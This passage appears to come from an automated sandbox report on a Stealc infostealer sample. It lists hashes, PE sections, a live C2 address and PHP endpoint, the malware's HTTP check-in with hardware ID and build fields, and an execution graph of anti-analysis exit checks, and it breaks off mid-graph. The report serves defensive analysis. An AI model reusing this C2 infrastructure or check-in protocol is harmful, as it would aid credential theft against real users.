                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.206/6c4adf523b719729.php
                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                  • 185.215.113.206/6c4adf523b719729.php
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.206/6c4adf523b719729.php
                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                  • 185.215.113.206/6c4adf523b719729.php
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.206/6c4adf523b719729.php

                                  Domains

                                  No context

                                  ASNs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealc, VidarBrowse
                                  • 185.215.113.206
                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                  • 185.215.113.206
                                  file.exeGet hashmaliciousLummaCBrowse
                                  • 185.215.113.16
                                  file.exeGet hashmaliciousLummaCBrowse
                                  • 185.215.113.16
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.206
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.206
                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                  • 185.215.113.206
                                  file.exeGet hashmaliciousLummaCBrowse
                                  • 185.215.113.16
                                  file.exeGet hashmaliciousStealcBrowse
                                  • 185.215.113.206
                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                  • 185.215.113.206

                                  JA3 Fingerprints

                                  No context

                                  Dropped Files

                                  No context

                                  Created / dropped Files

                                  No created / dropped files found

                                  Static File Info

                                  General

                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Entropy (8bit):7.9606922425137245
                                  TrID:
                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                  • DOS Executable Generic (2002/1) 0.02%
                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                  File name:file.exe
                                  File size:2'127'360 bytes
                                  MD5:264daa04defc6b3cb7cd8b682db05acd
                                  SHA1:10f55121d698817f1960530cbec2bd1da8564a8d
                                  SHA256:4a39c54963c15bf5b9388247e2a83ca5bbb1b69ca3e016ad75c8cea50a99a43a
                                  SHA512:d994b1e7db132e7cff596e977badcd5a57ca28c81360d6a5452bce1b66f6d0358a029555f5612fb8363ded8d6ca37e8e96cd43a89e45e1ed4dbef8f112c8159f
                                  SSDEEP:49152:bor8zruyLK/n+IzUoAeFBe2L0eN0xvVswI2fwhE+tLs+coR0qGPJ:8yO+IzUsBtL0HVs7rtY+coR0qGPJ
                                  TLSH:E3A5336BFB5E446DD88AE2BEE41BC9B97DA13E76474BA960BF4005351C1772013223F8
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b.}.............u^......uk......u_......{v.....fz./.....{f..............uZ......uh.....Rich....................PE..L...8n.g...

                                  File Icon

                                  Icon Hash:00928e8e8686b000

                                  Static PE Info

                                  General

                                  Entrypoint:0xb2a000
                                  Entrypoint Section:.taggant
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                  Time Stamp:0x671E6E38 [Sun Oct 27 16:45:44 2024 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:5
                                  OS Version Minor:1
                                  File Version Major:5
                                  File Version Minor:1
                                  Subsystem Version Major:5
                                  Subsystem Version Minor:1
                                  Import Hash:2eabe9054cad5152567f0699947a2c5b

                                  Entrypoint Preview

                                  Instruction
                                  jmp 00007F0DECBC2DEAh
                                  andps xmm4, dqword ptr [eax]
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add cl, ch
                                  add byte ptr [eax], ah
                                  add byte ptr [eax], al
                                  add byte ptr [edx+ecx], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  xor byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], 00000000h
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [edx], ah
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax+eax*4], cl
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  adc byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add dword ptr [edx], ecx
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al

                                  Rich Headers

                                  Programming Language:
                                  • [C++] VS2010 build 30319
                                  • [ASM] VS2010 build 30319
                                  • [ C ] VS2010 build 30319
                                  • [ C ] VS2008 SP1 build 30729
                                  • [IMP] VS2008 SP1 build 30729
                                  • [LNK] VS2010 build 30319

                                  Data Directories

                                  NameVirtual AddressVirtual Size Is in Section
                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x2e90500x64.idata
                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x2e91f80x8.idata
                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                  Sections

                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                  0x10000x2e70000x67600ebc39c9b19a6f4207044c9414823c532unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .rsrc 0x2e80000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .idata 0x2e90000x10000x200049071433b9f7c843453337b0fd53002False0.1328125data0.8946074494647072IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  0x2ea0000x2a20000x2006e47e0a01680733defa007962e82a363unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  iuotgoma0x58c0000x19d0000x19c600b7130feff10f6be0ec89426944c56111False0.9950269020915429data7.954742797276652IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  ujumrvwn0x7290000x10000x400cad865f7c5c294089cbc1665a24933beFalse0.787109375data6.182343172420204IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .taggant0x72a0000x30000x2200708f37411032fa6ebb0fabf06e54f985False0.06284466911764706DOS executable (COM)0.7785209813110858IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                  Imports

                                  DLLImport
                                  kernel32.dlllstrcpy

                                  Network Behavior

                                  Suricata IDS Alerts

                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                  2024-10-29T20:43:17.658007+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.549704185.215.113.20680TCP

                                  Network Port Distribution

                                  TCP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Oct 29, 2024 20:43:16.445331097 CET4970480192.168.2.5185.215.113.206
                                  Oct 29, 2024 20:43:16.452004910 CET8049704185.215.113.206192.168.2.5
                                  Oct 29, 2024 20:43:16.452100039 CET4970480192.168.2.5185.215.113.206
                                  Oct 29, 2024 20:43:16.452274084 CET4970480192.168.2.5185.215.113.206
                                  Oct 29, 2024 20:43:16.458726883 CET8049704185.215.113.206192.168.2.5
                                  Oct 29, 2024 20:43:17.367207050 CET8049704185.215.113.206192.168.2.5
                                  Oct 29, 2024 20:43:17.367336988 CET4970480192.168.2.5185.215.113.206
                                  Oct 29, 2024 20:43:17.370271921 CET4970480192.168.2.5185.215.113.206
                                  Oct 29, 2024 20:43:17.375947952 CET8049704185.215.113.206192.168.2.5
                                  Oct 29, 2024 20:43:17.657844067 CET8049704185.215.113.206192.168.2.5
                                  Oct 29, 2024 20:43:17.658006907 CET4970480192.168.2.5185.215.113.206
                                  Oct 29, 2024 20:43:19.554992914 CET4970480192.168.2.5185.215.113.206

                                  HTTP Request Dependency Graph

                                  • 185.215.113.206

                                  HTTP Packets

                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  0192.168.2.549704185.215.113.206803624C:\Users\user\Desktop\file.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 29, 2024 20:43:16.452274084 CET90OUTGET / HTTP/1.1
                                  Host: 185.215.113.206
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                  Oct 29, 2024 20:43:17.367207050 CET203INHTTP/1.1 200 OK
                                  Date: Tue, 29 Oct 2024 19:43:17 GMT
                                  Server: Apache/2.4.41 (Ubuntu)
                                  Content-Length: 0
                                  Keep-Alive: timeout=5, max=100
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8
                                  Oct 29, 2024 20:43:17.370271921 CET413OUTPOST /6c4adf523b719729.php HTTP/1.1
                                  Content-Type: multipart/form-data; boundary=----HDGCFHIDAKECFHIEBFCG
                                  Host: 185.215.113.206
                                  Content-Length: 211
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                  Data Raw: 2d 2d 2d 2d 2d 2d 48 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 44 45 41 42 45 43 46 38 41 39 34 32 31 33 38 31 30 34 36 30 34 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 43 46 48 49 44 41 4b 45 43 46 48 49 45 42 46 43 47 2d 2d 0d 0a
                                  Data Ascii: ------HDGCFHIDAKECFHIEBFCGContent-Disposition: form-data; name="hwid"2DEABECF8A942138104604------HDGCFHIDAKECFHIEBFCGContent-Disposition: form-data; name="build"tale------HDGCFHIDAKECFHIEBFCG--
                                  Oct 29, 2024 20:43:17.657844067 CET210INHTTP/1.1 200 OK
                                  Date: Tue, 29 Oct 2024 19:43:17 GMT
                                  Server: Apache/2.4.41 (Ubuntu)
                                  Content-Length: 8
                                  Keep-Alive: timeout=5, max=99
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8
                                  Data Raw: 59 6d 78 76 59 32 73 3d
                                  Data Ascii: YmxvY2s=


                                  Statistics

                                  CPU Usage

                                  Click to jump to process

                                  Memory Usage

                                  Click to jump to process

                                  High Level Behavior Distribution

                                  Click to dive into process behavior distribution

                                  System Behavior

                                  General

                                  Target ID:0
                                  Start time:15:43:11
                                  Start date:29/10/2024
                                  Path:C:\Users\user\Desktop\file.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\file.exe"
                                  Imagebase:0xc80000
                                  File size:2'127'360 bytes
                                  MD5 hash:264DAA04DEFC6B3CB7CD8B682DB05ACD
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2103784412.000000000150E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2061051331.0000000005370000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  Reputation:low
                                  Has exited:true

                                  Disassembly

                                  Reset < >

                                    Execution Graph

                                    Execution Coverage:3%
                                    Dynamic/Decrypted Code Coverage:0%
                                    Signature Coverage:3.5%
                                    Total number of Nodes:1327
                                    Total number of Limit Nodes:24
                                    execution_graph 37688 c96c90 37733 c822a0 37688->37733 37712 c96d04 37713 c9acc0 4 API calls 37712->37713 37714 c96d0b 37713->37714 37715 c9acc0 4 API calls 37714->37715 37716 c96d12 37715->37716 37717 c9acc0 4 API calls 37716->37717 37718 c96d19 37717->37718 37719 c9acc0 4 API calls 37718->37719 37720 c96d20 37719->37720 37885 c9abb0 37720->37885 37722 c96dac 37889 c96bc0 GetSystemTime 37722->37889 37724 c96d29 37724->37722 37726 c96d62 OpenEventA 37724->37726 37728 c96d79 37726->37728 37729 c96d95 CloseHandle Sleep 37726->37729 37732 c96d81 CreateEventA 37728->37732 37730 c96daa 37729->37730 37730->37724 37731 c96db6 CloseHandle ExitProcess 37732->37722 38086 c84610 37733->38086 37735 c822b4 37736 c84610 2 API calls 37735->37736 37737 c822cd 37736->37737 37738 c84610 2 API calls 37737->37738 37739 c822e6 37738->37739 37740 c84610 2 API calls 37739->37740 37741 c822ff 37740->37741 37742 c84610 2 API calls 37741->37742 37743 c82318 37742->37743 37744 c84610 2 API calls 37743->37744 37745 c82331 37744->37745 37746 c84610 2 API calls 37745->37746 37747 c8234a 37746->37747 37748 c84610 2 API calls 37747->37748 37749 c82363 37748->37749 37750 c84610 2 API calls 37749->37750 37751 c8237c 37750->37751 37752 c84610 2 API calls 37751->37752 37753 c82395 37752->37753 37754 c84610 2 API calls 37753->37754 37755 c823ae 37754->37755 37756 c84610 2 API calls 37755->37756 37757 c823c7 37756->37757 37758 c84610 2 API calls 37757->37758 37759 c823e0 37758->37759 37760 c84610 2 API calls 37759->37760 37761 c823f9 37760->37761 37762 c84610 2 API calls 37761->37762 37763 c82412 37762->37763 37764 c84610 2 API calls 37763->37764 37765 c8242b 37764->37765 37766 c84610 2 API calls 37765->37766 37767 c82444 37766->37767 37768 c84610 2 API calls 37767->37768 37769 c8245d 37768->37769 37770 c84610 2 API calls 37769->37770 37771 c82476 37770->37771 37772 c84610 2 API calls 37771->37772 37773 c8248f 37772->37773 37774 c84610 2 API calls 37773->37774 37775 c824a8 37774->37775 37776 c84610 2 API calls 37775->37776 37777 c824c1 37776->37777 37778 c84610 2 API calls 37777->37778 37779 c824da 37778->37779 37780 c84610 2 API calls 37779->37780 37781 c824f3 37780->37781 37782 c84610 2 API calls 37781->37782 37783 c8250c 37782->37783 37784 c84610 2 API calls 37783->37784 37785 c82525 37784->37785 37786 c84610 2 API calls 37785->37786 37787 c8253e 37786->37787 37788 c84610 2 API calls 37787->37788 37789 c82557 37788->37789 37790 c84610 2 API calls 37789->37790 37791 c82570 37790->37791 37792 c84610 2 API calls 37791->37792 37793 c82589 37792->37793 37794 c84610 2 API calls 37793->37794 37795 c825a2 37794->37795 37796 c84610 2 API calls 37795->37796 37797 c825bb 37796->37797 37798 c84610 2 API calls 37797->37798 37799 c825d4 37798->37799 37800 c84610 2 API calls 37799->37800 37801 c825ed 37800->37801 37802 c84610 2 API calls 37801->37802 37803 c82606 37802->37803 37804 c84610 2 API calls 37803->37804 37805 c8261f 37804->37805 37806 c84610 2 API calls 37805->37806 37807 c82638 37806->37807 37808 c84610 2 API calls 37807->37808 37809 c82651 37808->37809 37810 c84610 2 API calls 37809->37810 37811 c8266a 37810->37811 37812 c84610 2 API calls 37811->37812 37813 c82683 37812->37813 37814 c84610 2 API calls 37813->37814 37815 c8269c 37814->37815 37816 c84610 2 API calls 37815->37816 37817 c826b5 37816->37817 37818 c84610 2 API calls 37817->37818 37819 c826ce 37818->37819 37820 c99bb0 37819->37820 38091 c99aa0 GetPEB 37820->38091 37822 c99bb8 37823 c99de3 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 37822->37823 37824 c99bca 37822->37824 37825 c99e5d 37823->37825 37826 c99e44 GetProcAddress 37823->37826 37827 c99bdc 21 API calls 37824->37827 37828 c99e96 37825->37828 37829 c99e66 GetProcAddress GetProcAddress 37825->37829 37826->37825 37827->37823 37830 c99eb8 37828->37830 37831 c99e9f GetProcAddress 37828->37831 37829->37828 37832 c99ed9 37830->37832 37833 c99ec1 GetProcAddress 37830->37833 37831->37830 37834 c96ca0 37832->37834 37835 c99ee2 GetProcAddress GetProcAddress 37832->37835 37833->37832 37836 c9aa50 37834->37836 37835->37834 37837 c9aa60 37836->37837 37838 c96cad 37837->37838 37839 c9aa8e lstrcpy 37837->37839 37840 c811d0 37838->37840 37839->37838 37841 c811e8 37840->37841 37842 c8120f ExitProcess 37841->37842 37843 c81217 37841->37843 37844 c81160 GetSystemInfo 37843->37844 37845 c8117c ExitProcess 37844->37845 37846 c81184 37844->37846 37847 c81110 GetCurrentProcess VirtualAllocExNuma 37846->37847 37848 c81149 37847->37848 37849 c81141 ExitProcess 37847->37849 38092 c810a0 VirtualAlloc 37848->38092 37852 c81220 38096 c98b40 37852->38096 37855 c8129a 37858 c96a10 GetUserDefaultLangID 37855->37858 37856 c81249 __aulldiv 37856->37855 37857 c81292 ExitProcess 37856->37857 37859 c96a73 37858->37859 37860 c96a32 37858->37860 37866 c81190 37859->37866 37860->37859 37861 c96a6b ExitProcess 37860->37861 37862 c96a4d ExitProcess 37860->37862 37863 c96a61 ExitProcess 37860->37863 37864 c96a43 ExitProcess 37860->37864 37865 c96a57 ExitProcess 37860->37865 37861->37859 37867 c97a70 3 API calls 37866->37867 37868 c8119e 37867->37868 37869 c811cc 37868->37869 37870 c979e0 3 API calls 37868->37870 37873 c979e0 GetProcessHeap RtlAllocateHeap GetUserNameA 37869->37873 37871 c811b7 37870->37871 37871->37869 37872 c811c4 ExitProcess 37871->37872 37874 c96cd0 37873->37874 37875 c97a70 GetProcessHeap RtlAllocateHeap GetComputerNameA 37874->37875 37876 c96ce3 37875->37876 37877 c9acc0 37876->37877 38098 c9aa20 37877->38098 37879 c9acd1 lstrlen 37881 c9acf0 37879->37881 37880 c9ad28 38099 c9aab0 37880->38099 37881->37880 37883 c9ad0a lstrcpy lstrcat 37881->37883 37883->37880 37884 c9ad34 37884->37712 37886 c9abcb 37885->37886 37887 c9ac1b 37886->37887 37888 c9ac09 lstrcpy 37886->37888 37887->37724 37888->37887 38103 c96ac0 37889->38103 37891 c96c2e 37892 c96c38 sscanf 37891->37892 38132 c9ab10 37892->38132 37894 c96c4a SystemTimeToFileTime SystemTimeToFileTime 37895 c96c6e 37894->37895 37896 c96c80 37894->37896 37895->37896 37897 c96c78 ExitProcess 37895->37897 37898 c95d60 37896->37898 37899 c95d6d 37898->37899 37900 c9aa50 lstrcpy 37899->37900 37901 c95d7e 37900->37901 38134 c9ab30 lstrlen 37901->38134 37904 c9ab30 2 API calls 37905 c95db4 37904->37905 37906 c9ab30 2 API calls 37905->37906 37907 c95dc4 37906->37907 38138 c96680 37907->38138 37910 c9ab30 2 API calls 37911 c95de3 37910->37911 37912 c9ab30 2 API calls 37911->37912 37913 c95df0 37912->37913 37914 c9ab30 2 API calls 37913->37914 37915 c95dfd 37914->37915 37916 c9ab30 2 API calls 37915->37916 37917 c95e49 37916->37917 38147 c826f0 37917->38147 37925 c95f13 37926 c96680 lstrcpy 37925->37926 37927 c95f25 37926->37927 37928 c9aab0 lstrcpy 37927->37928 37929 c95f42 37928->37929 37930 c9acc0 4 API calls 37929->37930 37931 c95f5a 37930->37931 37932 c9abb0 lstrcpy 37931->37932 37933 c95f66 37932->37933 37934 c9acc0 4 API calls 37933->37934 37935 c95f8a 37934->37935 37936 c9abb0 lstrcpy 37935->37936 37937 c95f96 37936->37937 37938 c9acc0 4 API calls 37937->37938 37939 c95fba 37938->37939 37940 c9abb0 lstrcpy 37939->37940 37941 c95fc6 37940->37941 37942 c9aa50 lstrcpy 37941->37942 37943 c95fee 37942->37943 38873 c97690 GetWindowsDirectoryA 37943->38873 37946 c9aab0 lstrcpy 37947 c96008 37946->37947 38883 c848d0 37947->38883 37949 c9600e 39028 c919f0 37949->39028 37951 c96016 37952 c9aa50 lstrcpy 37951->37952 37953 c96039 37952->37953 37954 c81590 lstrcpy 37953->37954 37955 c9604d 37954->37955 39044 c859b0 34 API calls ctype 37955->39044 37957 c96053 39045 c91280 lstrlen lstrcpy 37957->39045 37959 c9605e 37960 c9aa50 lstrcpy 37959->37960 37961 c96082 37960->37961 37962 c81590 lstrcpy 37961->37962 37963 c96096 37962->37963 39046 c859b0 34 API calls ctype 37963->39046 37965 c9609c 39047 c90fc0 StrCmpCA StrCmpCA StrCmpCA lstrlen lstrcpy 37965->39047 37967 c960a7 37968 c9aa50 lstrcpy 37967->37968 37969 c960c9 37968->37969 37970 c81590 lstrcpy 37969->37970 37971 c960dd 37970->37971 39048 c859b0 34 API calls ctype 37971->39048 37973 c960e3 39049 c91170 StrCmpCA lstrlen lstrcpy 37973->39049 37975 c960ee 37976 c81590 lstrcpy 37975->37976 37977 c96105 37976->37977 39050 c91c60 115 API calls 37977->39050 37979 c9610a 37980 c9aa50 lstrcpy 37979->37980 37981 c96126 37980->37981 39051 c85000 7 API calls 37981->39051 37983 c9612b 37984 c81590 lstrcpy 37983->37984 37985 c961ab 37984->37985 39052 c908a0 286 API calls 37985->39052 37987 c961b0 37988 c9aa50 lstrcpy 37987->37988 37989 c961d6 37988->37989 37990 c81590 lstrcpy 37989->37990 37991 c961ea 37990->37991 39053 c859b0 34 API calls ctype 37991->39053 37993 c961f0 39054 c913c0 StrCmpCA lstrlen lstrcpy 37993->39054 37995 c961fb 37996 c81590 lstrcpy 37995->37996 37997 c9623b 37996->37997 39055 c81ec0 59 API calls 37997->39055 37999 c96240 38000 c96250 37999->38000 38001 c962e2 37999->38001 38003 c9aa50 lstrcpy 38000->38003 38002 c9aab0 lstrcpy 38001->38002 38005 c962f5 38002->38005 38004 c96270 38003->38004 38006 c81590 lstrcpy 38004->38006 38007 c81590 lstrcpy 38005->38007 38008 c96284 38006->38008 38009 c96309 38007->38009 39056 c859b0 34 API calls ctype 38008->39056 39059 c859b0 34 API calls ctype 38009->39059 38012 c9630f 39060 c937b0 31 API calls 38012->39060 38013 c9628a 39057 c91520 19 API calls ctype 38013->39057 38016 c962da 38019 c9635b 38016->38019 38021 c81590 lstrcpy 38016->38021 38017 c96295 38018 c81590 lstrcpy 38017->38018 38020 c962d5 38018->38020 38023 c96380 38019->38023 38024 c81590 lstrcpy 38019->38024 39058 c94010 67 API calls 38020->39058 38026 c96337 38021->38026 38025 c963a5 38023->38025 38028 c81590 lstrcpy 38023->38028 38027 c9637b 38024->38027 38030 c963ca 38025->38030 38035 c81590 lstrcpy 38025->38035 39061 c94300 57 API calls 2 library calls 38026->39061 39063 c949d0 88 API calls ctype 38027->39063 38033 c963a0 38028->38033 38031 c963ef 38030->38031 38036 c81590 lstrcpy 38030->38036 38037 c96414 38031->38037 38042 c81590 lstrcpy 38031->38042 39064 c94e00 61 API calls ctype 38033->39064 38034 c9633c 38039 c81590 lstrcpy 38034->38039 38040 c963c5 38035->38040 38041 c963ea 38036->38041 38044 c96439 38037->38044 38050 c81590 lstrcpy 38037->38050 38043 c96356 38039->38043 39065 c94fc0 65 API calls 38040->39065 39066 c95190 63 API calls ctype 38041->39066 38048 c9640f 38042->38048 39062 c95350 45 API calls 38043->39062 38046 c96460 38044->38046 38051 c81590 lstrcpy 38044->38051 38052 c96470 38046->38052 38053 c96503 38046->38053 39067 c87770 108 API calls ctype 38048->39067 38055 c96434 38050->38055 38057 c96459 38051->38057 38059 c9aa50 lstrcpy 38052->38059 38058 c9aab0 lstrcpy 38053->38058 39068 c952a0 61 API calls ctype 38055->39068 39069 c991a0 46 API calls ctype 38057->39069 38061 c96516 38058->38061 38062 c96491 38059->38062 38063 c81590 lstrcpy 38061->38063 38064 c81590 lstrcpy 38062->38064 38065 c9652a 38063->38065 38066 c964a5 38064->38066 39073 c859b0 34 API calls ctype 38065->39073 39070 c859b0 34 API calls ctype 38066->39070 38069 c96530 39074 c937b0 31 API calls 38069->39074 38070 c964ab 39071 c91520 19 API calls ctype 38070->39071 38073 c964b6 38075 c81590 lstrcpy 38073->38075 38074 c964fb 38076 c9aab0 lstrcpy 38074->38076 38077 c964f6 38075->38077 38078 c9654c 38076->38078 39072 c94010 67 API calls 38077->39072 38080 c81590 lstrcpy 38078->38080 38081 c96560 38080->38081 39075 c859b0 34 API calls ctype 38081->39075 38083 c9656c 38085 c96588 38083->38085 39076 c968d0 9 API calls ctype 38083->39076 38085->37731 38087 c84621 RtlAllocateHeap 38086->38087 38090 c84671 VirtualProtect 38087->38090 38090->37735 38091->37822 38094 c810c2 ctype 38092->38094 38093 c810fd 38093->37852 38094->38093 38095 c810e2 VirtualFree 38094->38095 38095->38093 38097 c81233 GlobalMemoryStatusEx 38096->38097 38097->37856 38098->37879 38100 c9aad2 38099->38100 38101 c9aafc 38100->38101 38102 c9aaea lstrcpy 38100->38102 38101->37884 38102->38101 38104 c9aa50 lstrcpy 38103->38104 38105 c96ad3 38104->38105 38106 c9acc0 4 API calls 38105->38106 38107 c96ae5 38106->38107 38108 c9abb0 lstrcpy 38107->38108 38109 c96aee 38108->38109 38110 c9acc0 4 API calls 38109->38110 38111 c96b07 38110->38111 38112 c9abb0 lstrcpy 38111->38112 38113 c96b10 38112->38113 38114 c9acc0 4 API calls 38113->38114 38115 c96b2a 38114->38115 38116 c9abb0 lstrcpy 38115->38116 38117 c96b33 38116->38117 38118 c9acc0 4 API calls 38117->38118 38119 c96b4c 38118->38119 38120 c9abb0 lstrcpy 38119->38120 38121 c96b55 38120->38121 38122 c9acc0 4 API calls 38121->38122 38123 c96b6f 38122->38123 38124 c9abb0 lstrcpy 38123->38124 38125 c96b78 38124->38125 38126 c9acc0 4 API calls 38125->38126 38127 c96b93 38126->38127 38128 c9abb0 lstrcpy 38127->38128 38129 c96b9c 38128->38129 38130 c9aab0 lstrcpy 38129->38130 38131 c96bb0 38130->38131 38131->37891 38133 c9ab22 38132->38133 38133->37894 38135 c9ab4f 38134->38135 38136 c95da4 38135->38136 38137 c9ab8b lstrcpy 38135->38137 38136->37904 38137->38136 38139 c9abb0 lstrcpy 38138->38139 38140 c96693 38139->38140 38141 